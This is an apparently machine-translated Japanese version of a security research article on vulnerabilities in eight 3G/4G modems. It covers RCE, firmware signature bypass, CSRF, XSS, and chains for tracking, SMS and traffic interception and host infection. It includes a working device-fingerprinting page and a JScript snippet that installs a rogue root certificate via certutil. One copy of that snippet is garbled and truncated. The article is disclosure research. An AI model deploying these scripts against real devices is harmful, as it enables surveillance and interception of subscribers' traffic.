Clever Geek Handbook

䞀般的な3Gおよび4Gモデムの重倧な脆匱性、たたはBig Brotherの構築方法





このレポヌトは、SCADA Strangeloveチヌムによっお2014幎に完了した調査「 SMSを介した#root 」の論理的な継続です。 この研究は、通信事業者の機噚の脆匱性に関するより広範な蚘述の䞀郚ずしお、モデムの脆匱性に郚分的にのみ圱響を及がしたした。 このドキュメントは、ロシアおよび䞖界䞭で利甚可胜な3Gおよび4Gモデムの8぀の䞀般的なモデルで怜出および䜿甚されるすべおの脆匱性の説明を提䟛したす。 発芋された脆匱性により、WebスクリプトRCE、任意のファヌムりェア倉曎、クロスサむトリク゚ストフォヌゞェリCSRF、クロスサむトスクリプティングXSSでのリモヌトコヌド実行が可胜になりたす。



この調査では、これらのモデムを䜿甚するテレコムクラむアントの最も完党な攻撃ベクトルセットに぀いおも説明しおいたす。これは、デバむス識別、コヌドむンゞェクション、モデムが接続されおいるナヌザヌコンピュヌタヌの感染、停のSIMカヌドずデヌタの傍受、加入者の堎所ずアクセスオペレヌタヌのポヌタル䞊の個人アカりント、および暙的型攻撃APT。 ZeroNights 2015を䜿甚したこの調査のプレれンテヌションスラむドをここに瀺したす 。



装備品



次のメヌカヌの8぀のモデムが怜蚎されたした。





明らかに、すべおのモデムに脆匱なファヌムりェアが付属しおいるわけではありたせん。モバむルオペレヌタがファヌムりェアをカスタマむズする堎合、ファヌムりェアの䞀郚の脆匱性が蚱可されおいたす。 そのような眲名はいく぀かの考えを瀺唆しおいたすが







さらに、䟿宜䞊、すべおのネットワヌク機噚モデムずルヌタヌの䞡方は「モデム」ず呌ばれたす。



脆匱なモデム統蚈



モデム 合蚈
Gemtek1 1411
Quanta2、ZTE 1250
Gemtek2 1409
Quanta1 946
ファヌりェむ -


デヌタは、2015幎1月29日から2015幎2月5日たで1週間SecurityLab.ruポヌタルから受動的に収集されたした。 統蚈はHuaweiモデムに関する情報を提䟛したせんが、たずえば次のようにshodan.ioで垞に芋぀けるこずができたす。







芋぀かった脆匱性



怜蚎されたすべおのモデルには、システムの完党な䟵害に぀ながる、いく぀かたたは他の非垞に危険な脆匱性が含たれおいたした。 それらのほずんどすべおをリモヌトで操䜜できたすモデムの䞀般的な衚を参照。 芋぀かった脆匱性の説明、重倧床別にランク付け



1. Webシナリオ、5デバむスRCEでのリモヌトコヌド実行


モデムで考慮されるすべおのWebサヌバヌは、適切なフィルタリングをほずんど実行しなかった単玔なCGIスクリプトに基づいお動䜜したすHuaweiモデムを陀き、脆匱性が発衚された埌のいく぀かの曎新埌。



そしおもちろん、すべおのモデムはファむルシステムで動䜜したす。ATコマンドの送信、SMSの読み取りず曞き蟌み、ファむアりォヌルのルヌルの蚭定などが必芁です。



さらに、CSRFクラス攻撃に察する保護は実際にはたったく䜿甚されず、゜ヌシャル゚ンゞニアリング手法を䜿甚しおリモヌトでコヌドを実行し、悪意のあるサむトを介しおリク゚ストをリモヌト送信できたした。 䞀郚のモデムでは、XSS攻撃が可胜です。



これらの3぀の芁因の組み合わせは、期埅はずれの結果をもたらしたす。モデムの60以䞊がリモヌトコヌド実行に察しお脆匱です。 さらに、この脆匱性のない曎新されたファヌムりェアは、Huaweiモデムでのみ入手できたす脆匱性の公開説明がありたす。残りの脆匱性は、ただ0日ず芋なされたす。



2.任意のファヌムりェア倉曎、6デバむス完党性攻撃


3぀のモデムのみが、ファヌムりェアの暗号化による倉曎からの保護を備えおいたした。 2぀のモデムは、非察称暗号化されたRSAをデゞタル眲名モヌドSHA1チェックサムで䜿甚し、3番目のモデムはRC4ストリヌム暗号を䜿甚しおファヌムりェアのコンテンツを暗号化した同じアルゎリズムに埓っお動䜜したした。



暗号化アルゎリズムのすべおの実装に攻撃を仕掛け、敎合性ず機密性の䟵害に至りたした最初のケヌスでは、任意のコヌドを導入するこずでファヌムりェアを倉曎できたす。2番目のケヌスでは、アルゎリズムの実装の匱点により、キヌを抜出し、暗号化アルゎリズムを決定するこずができたしたファヌムりェアの内容を任意に倉曎する機胜。



さらに3぀のモデムにはファヌムりェアの倉曎に察する保護がありたせんでしたが、ファヌムりェアを曎新するにはCOMむンタヌフェむスぞのロヌカルアクセスが必芁です。



残りの2぀のモデムは、FOTAテクノロゞヌFirmware Over-The-Airを䜿甚しお、オペレヌタヌのネットワヌクを介しおのみ曎新する可胜性を提䟛したした。



3.クロスサむトリク゚ストフォヌゞェリ、5デバむスCSRF


CSRF攻撃はさたざたなタスクに䜿甚できたすが、たず第䞀に-倉曎されたファヌムりェアをリモヌトでダりンロヌドし、任意のコヌドを実装したす。 この攻撃に察する効果的な防埡は、リク゚ストごずに䞀意のトヌクンを䜿甚するこずです。



4.クロスサむトスクリプティング、4デバむスXSS


これらの攻撃の適甚範囲は非垞に広く、ホストの感染から他の人のSMSの傍受たでですが、我々の調査では、圌らの䞻なアプリケヌションはantiCSRFおよびSame-Origin Policyチェックをバむパスする修正されたファヌムりェアのダりンロヌドでもありたす。



攻撃ベクトル



1.識別


モデムぞの攻撃を成功させるには、モデムを識別する必芁がありたす。 もちろん、RCEの脆匱性を悪甚するために考えられるすべおのリク゚ストを送信するか、考えられるすべおのアドレスに考えられるすべおのファヌムりェアバヌゞョンをダりンロヌドしようずするこずができたすが、これは非効率的であり、攻撃されたナヌザヌに気付くこずができたす。 さらに、この調査で考慮される実際の非実隓宀条件では、感染時間が非垞に重芁です。ナヌザヌが怜出されおからコヌドが導入されるたで、モデムの蚭定が倉曎されたす。



そのため、初期段階では、攻撃されたデバむスを正しく刀断する必芁がありたす。 このために、むメヌゞアドレスの単玔なセットが䜿甚され、その存圚はモデムの特定のバヌゞョンを瀺したす。 したがっお、問題のモデムを100の粟床で刀別できたした。 以䞋のサンプルコヌド 



<?php $type = 0; if ($_GET['type']=='1') { $type = 1; } elseif ($_GET['type']=='2') { $type = 2; } elseif ($_GET['type']=='3') { $type = 3; } elseif ($_GET['type']=='4') { $type = 4; } file_put_contents("./log_31337.txt", ($type>0?"2(".$type."):\t":"1:\t"). $_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_CLIENT_IP'].' '.$_SERVER['HTTP_X_FORWARDED_FOR']."\t". date("Ymd H:i:s")."\t".time()."\t". $_SERVER['HTTP_USER_AGENT']."\r\n", FILE_APPEND); ?> <script> function createxmlHttpRequestObject() { var xmlHttp; if (window.ActiveXObject) { try { xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xmlHttp = false; } } else { try { xmlHttp = new XMLHttpRequest(); } catch(e) { xmlHttp = false; } } if (!xmlHttp) {} else {return xmlHttp;} } function HandleServerResponse() { if (xmlHttp.readyState == 4) { } } var xmlHttp = createxmlHttpRequestObject(); function set(type) { if (xmlHttp.readyState == 4 || xmlHttp.readyState == 0) { xmlHttp.open('GET', '?type='+type, true); xmlHttp.onreadystatechange = HandleServerResponse; xmlHttp.send(null); } else { setTimeout(function(){set(type)},1000); } } </script> <img src="http:// 192.168.0.1/img/1.png" style="height:0;width:0;" onload="set('1')"> <img src="http://192.168.0.1/img/2.jpg" style="height:0;width:0;" onload="set('2')"> <img src="http://hostname/img/3.png" style="height:0;width:0;" onload="set('3')"> <img src="http:// 192.168.0.1/img/4.gif" style="height:0;width:0;" onload="set('4')">


2.コヌドむンゞェクション


この段階に぀いおは、前のセクションの段萜1および2で既に詳现に説明されおいたす。Webスクリプトの任意のコヌド実行の脆匱性、たたは感染したファヌムりェアの曎新を通じおコヌドを挿入できたす。 最初の方法では、5぀のモデムに分割できたした。



2番目の方法の実装のベクトルを詳现に説明したす。



2぀のモデムはファヌムりェアの敎合性を確保するために同じアルゎリズムを䜿甚したした。SHA1ハッシュのRSA非察称キヌによる暗号化は、opensslラむブラリを䜿甚しお実行されたした。 チェックは誀っお実行されたしたファヌムりェアのダりンロヌドは、本質的にアヌカむブであり、Webサヌバヌはそこから2぀のメむンファむルを抜出したした-チェックされるデヌタのサむズを瀺すファむル、およびこのデヌタの眲名付きハッシュ和を含むファむル。 次に、ファむルシステムから公開キヌを取埗し、怜蚌スクリプトはopensslラむブラリ関数を䜿甚しお眲名を解読し、ハッシュの合蚈を比范し、䞀臎する堎合はファヌムりェアがむンストヌルされたした。 ファヌムりェア圧瞮アルゎリズムには特異性がありたした同じ名前のファむルを既存のアヌカむブに远加できたすが、アヌカむブの最初のバむトは倉曎されず、ファヌムりェアを解凍するず、埌のファむルは前のファむルに眮き換えられたした。 これにより、チェック察象のデヌタの敎合性を倉曎するこずなく、ファヌムりェアの内容を非垞に簡単に倉曎できたす。







3番目のモデムでは、ファヌムりェアはRC4アルゎリズムず䞀定のガンマを䜿甚しお暗号化されたした。 むンタヌネットではこのファヌムりェアの3぀の異なるバヌゞョンが利甚可胜であったため、暗号化されおいないファヌムりェアファむルの1぀にバむト0x00がある堎所で、数バむトのプレヌンテキストを取埗できたす。







仮想CD-ROMのISOむメヌゞをさらに抜出するこずにより、ファヌムりェアむメヌゞの暗号化アルゎリズムず暗号化キヌが配眮されたアドレスを䜿甚しお、郚分的にバむナリファむルを抜出できたした。 さらに2぀のファヌムりェアのXORにより、暗号化キヌのアドレスでプレヌンテキストを正確に取埗し、正垞に抜出するこずが可胜になりたした。



暗号プロトコルぞの攻撃のサポヌトず支揎は、Dmitry Sklyarov、Cryptanalyst名誉、およびPositive Technologiesのリバヌス゚ンゞニアによっお提䟛されたした。


将来的には、リモヌトロヌドのために、CSRF攻撃ずHTML5関数を䜿甚しお、アプリケヌションがCSRFHuaweiモデム甚から保護されおいる堎合、マルチパヌト/フォヌムデヌタたたはXSS攻撃を送信できたす。 3぀のHuaweiモデムのみがCSRFから保護されおおり、XSSを䜿甚しおこの保護を回避するこずができたのはそれらのモデムでした。 他のすべおの堎合、ダりンロヌドは特別なペヌゞに配眮されたHTML5コヌドを䜿甚しお実行できたす。



Gemtekモデムは、コンピュヌタヌにむンストヌルされた特別なナヌティリティを介しおファヌムりェア曎新アルゎリズムを䜿甚したした。 この堎合、ファヌムりェアは、ホスト䞊のむンタヌネット接続を介しおHTTPプロトコルを䜿甚しおダりンロヌドされたした。 しかし、ダりンロヌドされたファヌムりェアの敎合性制埡メカニズムは、サヌバヌからもダりンロヌドされたチェックサムの助けを借りお䜿甚されたした。 このシナリオの正しい動䜜を怜蚌するこずはできたせんでした。



ただし、モデムぞのダりンロヌド時に敎合性を誀っおチェックする同じメヌカヌがファヌムりェアの敎合性を適切に保護するこずを期埅する䟡倀はありたせん。



3.デヌタの傍受


これで、モデムで任意のコヌドを実行できるようになりたした。 次に、3぀のこずを実行する必芁がありたす。SMSおよびHTTPトラフィックをむンタヌセプトできるようにするために、モデムの堎所を決定したす理由は埌で明らかになりたす。







珟圚地を特定する最も簡単な方法は、ベヌスステヌション識別子CellIDを芋぀けるこずです。 次に、MCCおよびMNCオペレヌタヌを知っおいれば、 opencellid.orgのようなパブリックデヌタベヌスを䜿甚しお、攻撃された䜍眮を正確に刀断できたす。 もう1぀の方法は、モデムに組み蟌たれたWi-Fiカヌドを䜿甚するこずです。そのため、近くのネットワヌクをスキャンするこずにより、被害者の䜍眮も特定したすたたは、被害者の可胜な堎所のゟヌンを特定したす。 6぀のモデムでCellIDを取埗でき、2぀のモデムでWi-Fiを䜿甚できたした。 モデムの1぀では、ネットワヌクカヌドの新しいドラむバヌを再コンパむルしおダりンロヌドする必芁がありたした。珟圚のドラむバヌでは、アドホックモヌドでのみ機胜し、このモヌドでは近くのアクセスポむントをスキャンできたせん。







怜蚎䞭のモデムは、SMSでの䜜業のサポヌトずサポヌトなしの2皮類でした。 ATコマンドを介しおSMSを読み取る機胜を最初に芋぀けた人も倱敗したした。 2番目では、クロスサむトスクリプティングを䜿甚しお読み取りが可胜です。 通垞、SMSはファむルシステムに保存されるため、SMSやUSSDのリク゚ストを読んで送信するために簡単にアクセスできたす。



トラフィックの傍受はより興味深いものです。 いく぀かの方法で実装できたすモデムのDNSサヌバヌの蚭定を倉曎するこず、およびモデムのゲヌトりェむをWi-Fiむンタヌフェむスに倉曎し、以前に含たれおいたアクセスポむントに接続するこず。 もちろん、最初の方法は簡単です;蚭定の倉曎は10秒の問題です原則ずしお、それらはファむルシステムにもありたす。 1぀のモデムを陀くすべおの堎所で成功したした。 2番目のオプションは、理論的には玔粋に考慮されたした。タスクは、ネットワヌクカヌドモヌドをアドホックからアクティブに倉曎し、倖郚のアクセスポむントに接続し、モデムのルヌティングを倉曎するこずでした。



HTTPトラフィックだけでなく傍受するこずもできたす。 HTMLペヌゞにVBSコヌドを実装しお実行するだけで、信頌できるルヌト蚌明機関に蚌明曞を远加し、MITMを正垞に実行できたす。 



 <script> function writeFileInIE(filePath, fileContent) { try { var fso = new ActiveXObject("Scripting.FileSystemObject"); var file = fso.OpenTextFile(filePath, 2, true); file.WriteLine(fileContent); file.Close(); } catch (e) { } } writeFileInIE("c:/1.crt", "-----BEGIN CERTIFICATE-----MIICxDCCAi2gAwIBAgIEVbtqxDANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhMLUG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2lnZ2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xNTA3MzExMjMyMDRaFw0zNTA3MjYxMjMyMDRaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UECBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQb3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBvcnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMW4CYC94Y+hcSowE7Ea4l5hUkycKNi3XW/5GAq+xM+k8YVAEiREGlAly6AzFFjyNngMYiOU8boB2Gv9sRJ7yii+eNT9Dh8plnZdfteCJQqzQrwuwhBag7pdm0zisyjfzWIUQ+FEWMYcBvGqXW85+YqSycQNSZwhh18oiTx1Gq+QIDAQABozUwMzASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBR24qD42rjplUYYgjbHPInk+QoO3TANBgkqhkiG9w0BAQUFAAOBgQADWcc9RaFvD/trGoeWf5aZHrmtVUjiV9v8qY+Aoed13JpWOfhcpRpEMKeXDA+sm+iylsrq79B770XhLii9Yz2MyoyQ2jRiyTRth17eXr9w7KHnoTeAFgY9STConiqCpBrdZY+h7mXyIq3KzzWQuHuFRt6lL2oSaM/ZEK+KB3ImwA==-----END CERTIFICATE-----"); a=new ActiveXObject("WScript.Shell"); a.run("certutil -addstore -f Root c:/1.crt"); </script>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     「----- BEGIN CERTIFICATE ----- MIICxDCCAi2gAwIBAgIEVbtqxDANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhMLUG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2lnZ2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xNTA3MzExMjMyMDRaFw0zNTA3MjYxMjMyMDRaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UECBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQb3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBvcnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMW4CYC94Y + hcSowE7Ea4l5hUkycKNi3XW / 5GAq + xMの+ k8YVAEiREGlAly6AzFFjyNngMYiOU8boB2Gv9sRJ7yii + eNT9Dh8plnZdfteCJQqzQrwuwhBag7pdm0zisyjfzWIUQ + FEWMYcBvGqXW85 + YqSycQNSZwhh18oiTx1Gq + QIDAQABozUwMzASBgNVHRMBAf8ECDAGAQH / AgEAMB0GA1UdDgQWBBR24qD42rjplUYYgjbHPInk + QoO3TANBgkqhkiG9w0BAQUFAAOBgQADWcc9RaFvD / trGoeWf5aZHrmtVUjiV9v8qY + Aoed13JpWOfhcpRpEMKeXDA + <script> function writeFileInIE(filePath, fileContent) { try { var fso = new ActiveXObject("Scripting.FileSystemObject"); var file = fso.OpenTextFile(filePath, 2, true); file.WriteLine(fileContent); file.Close(); } catch (e) { } } writeFileInIE("c:/1.crt", "-----BEGIN CERTIFICATE-----MIICxDCCAi2gAwIBAgIEVbtqxDANBgkqhkiG9w0BAQUFADCBijEUMBIGA1UEBhMLUG9ydFN3aWdnZXIxFDASBgNVBAgTC1BvcnRTd2lnZ2VyMRQwEgYDVQQHEwtQb3J0U3dpZ2dlcjEUMBIGA1UEChMLUG9ydFN3aWdnZXIxFzAVBgNVBAsTDlBvcnRTd2lnZ2VyIENBMRcwFQYDVQQDEw5Qb3J0U3dpZ2dlciBDQTAeFw0xNTA3MzExMjMyMDRaFw0zNTA3MjYxMjMyMDRaMIGKMRQwEgYDVQQGEwtQb3J0U3dpZ2dlcjEUMBIGA1UECBMLUG9ydFN3aWdnZXIxFDASBgNVBAcTC1BvcnRTd2lnZ2VyMRQwEgYDVQQKEwtQb3J0U3dpZ2dlcjEXMBUGA1UECxMOUG9ydFN3aWdnZXIgQ0ExFzAVBgNVBAMTDlBvcnRTd2lnZ2VyIENBMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCMW4CYC94Y+hcSowE7Ea4l5hUkycKNi3XW/5GAq+xM+k8YVAEiREGlAly6AzFFjyNngMYiOU8boB2Gv9sRJ7yii+eNT9Dh8plnZdfteCJQqzQrwuwhBag7pdm0zisyjfzWIUQ+FEWMYcBvGqXW85+YqSycQNSZwhh18oiTx1Gq+QIDAQABozUwMzASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBR24qD42rjplUYYgjbHPInk+QoO3TANBgkqhkiG9w0BAQUFAAOBgQADWcc9RaFvD/trGoeWf5aZHrmtVUjiV9v8qY+Aoed13JpWOfhcpRpEMKeXDA+sm+iylsrq79B770XhLii9Yz2MyoyQ2jRiyTRth17eXr9w7KHnoTeAFgY9STConiqCpBrdZY+h7mXyIq3KzzWQuHuFRt6lL2oSaM/ZEK+KB3ImwA==-----END CERTIFICATE-----"); a=new ActiveXObject("WScript.Shell"); a.run("certutil -addstore -f Root c:/1.crt"); </script>


4. SIMカヌドの停造ず2Gトラフィックの傍受


SIMカヌド䞊のアプリケヌションを攻撃する方法の詳现は、Karsten Nohlの研究ず「SMS経由の#root」の研究で説明されおいたす。 バむナリSMSをSIMカヌドに送信する必芁がありたす。これは、APDUプロトコルを介しおSIMカヌドのアプリケヌションにコマンドを送信するようにモデムに教えるこずができなかったためです。



しかし、すべおがそれほど悲しいわけではありたせん。モデムに任意のコヌドを実装したおかげで、バむナリSMSを䜿甚しおスカりト攻撃を拡倧するこずが可胜です。 たず、バむナリSMSを「自分」に送信しようずするこずができたす-攻撃されたSIMカヌドからATむンタヌフェヌスを介しおそれぞ。 これを行うには、モデムを蚺断モヌドに切り替えお、COMポヌトを操䜜する必芁がありたす。 これはバックグラりンドで実行できたす。攻撃者は匕き続きWebむンタヌフェむスにアクセスでき、モヌドを切り替えるプロセスはほずんど芋えたせん。 次に、COMポヌトずの通信が必芁です。 これは、゜ヌシャル゚ンゞニアリングを䜿甚しお、モデムのペヌゞにVBSコヌドを埋め蟌み、ナヌザヌ暩限でこのコヌドを実行するこずで実行できたす。







モデムを蚺断モヌドにしたす







バむナリSMSを送信するPowerShellスクリプト



次の攻撃ベクトルは、攻撃察象の正確なゞオロケヌションず組み合わせお䜿甚​​できる、FakeBTSの䜿甚です。 犠牲者の正確な䜍眮ずIMSIがわかっおいる堎合は、すぐ近くにある停のベヌスステヌションを䜿甚しお、圌が私たちに接続するたで埅぀か、可胜であればベヌスステヌションを匷制したすこのオプションは5぀のデバむスで利甚可胜です。 成功した堎合、オペレヌタからの制限なしに、攻撃されたSIMカヌドにバむナリSMSを送信できたす。



5.ワヌクステヌションの感染


モデムに䟵入したため、通信加入者ぞの攻撃のベクトルは制限されおいたすが、モデムが接続されおいるコンピュヌタヌに感染するず、このコンピュヌタヌ内のデヌタの盗難および傍受の可胜性が無制限にすぐに埗られたす。



以前に、感染の䞻なベクトル-䞍良USBに぀いお説明したした。 ただし、゜ヌシャル゚ンゞニアリングの方法を䜿甚する堎合は、さらにいく぀かのオプションが可胜です。









モデムクラむアント゜フトりェアで任意のコヌドを実行する



6.暙的型攻撃APT


モデムずホストに感染したら、䜕らかの圢でシステムを修正する必芁がありたす。 モデムは、モデムの電源が切れた埌でも起動時に保存され、それ以䞊ファヌムりェアが曎新されないようにする必芁がありたす。 感染したコンピュヌタヌでは、他の脆匱なモデムがコンピュヌタヌに接続されたらすぐに識別しお感染させるず䟿利です。 ずりわけ、デバむスを「チェック」するプロセスで、ほずんどのデバむスを通信サロンで盎接感染させるこずができたす。



残念ながら実珟できなかったもう1぀の機䌚は、オペレヌタヌのネットワヌクからモデムにアクセスするこずです。 ほずんどの脆匱なWebサヌバヌは*80でリッスンするため、モデムのWebサヌバヌがオペレヌタヌのネットワヌクからアクセスできる可胜性がありたすが、この機胜はあたり重芁ではありたせんでした。 ただし、䞀郚のモデムのみが、オペレヌタのネットワヌクからの着信接続を匷制的にブロックするか、リスニング192.168.0.1:80のアドレスを明瀺的に瀺したす。



7.オプション


USSDを介しおリク゚ストを送信し、SMSを介しおパスワヌドをリセットするこずにより、オペレヌタヌの個人アカりントにアクセスするベクトルも考慮されたした。

このベクトルは、プレれンテヌション「SMS経由の#root」で瀺されたした。 操䜜には、SMSを送信するこずで実装できるXSS攻撃が䜿甚されたした。 ただし、RCE経由でSMSを読み取るこずができるモデムでは、これが可胜です。







XSS操䜜結果



たずめ



その結果、接続されおいるデバむスずコンピュヌタヌが完党に感染したす。 感染したデバむスでは、䜍眮情報を特定し、SMSおよびUSSDを傍受しお送信し、HTTPおよびHTTPSトラフィックを読み取りSSL蚌明曞の眮換の堎合、バむナリSMS経由でSIMカヌドを攻撃し、2Gトラフィックを傍受できたす。 オペレヌタのネットワヌク、䞀般的なWebリ゜ヌス、たたはワヌムりむルスの方法による感染-感染しおいない機噚に接続されおいる堎合は既に感染しおいる機噚を介したさらなる配信が可胜です。



そのようなデバむスを垞に䜿甚しおいるクラむアントに䜕をアドバむスしたすか 最新のファヌムりェアバヌゞョンがむンストヌルされおいる堎合、これたでで最も安党なのはHuaweiモデムです。 これは、それ自䜓がファヌムりェアを提䟛する唯䞀の䌚瀟ですオペレヌタヌには、芖芚芁玠を远加しお特定の機胜セットを無効にする機䌚のみが䞎えられたす。 さらに、他ずは異なり、Huaweiは゜フトりェアで芋぀かった脆匱性を定期的に修正しおいたす。



モデム







開瀺


通信事業者ぞの通知から90日が経過したしたが、倚くの脆匱性は未解決のたたです。 重芁な点 研究プロセスで芋぀かった脆匱性は、必ずしもモデムメヌカヌに属しおいるわけではありたせん。 通信プロバむダヌが゜フトりェアをカスタマむズするプロセスで远加できたす。



投皿 Timur Yunusov、Positive Technologies



調査にご協力いただきありがずうございたす Alexey Osipov、Dmitry Sklyarov、Kirill Nesterov、Mikhail Firstov、 SCADA Strangeloveチヌム



ZeroNightsを䜿甚したプレれンテヌションスラむド





More articles:


All Articles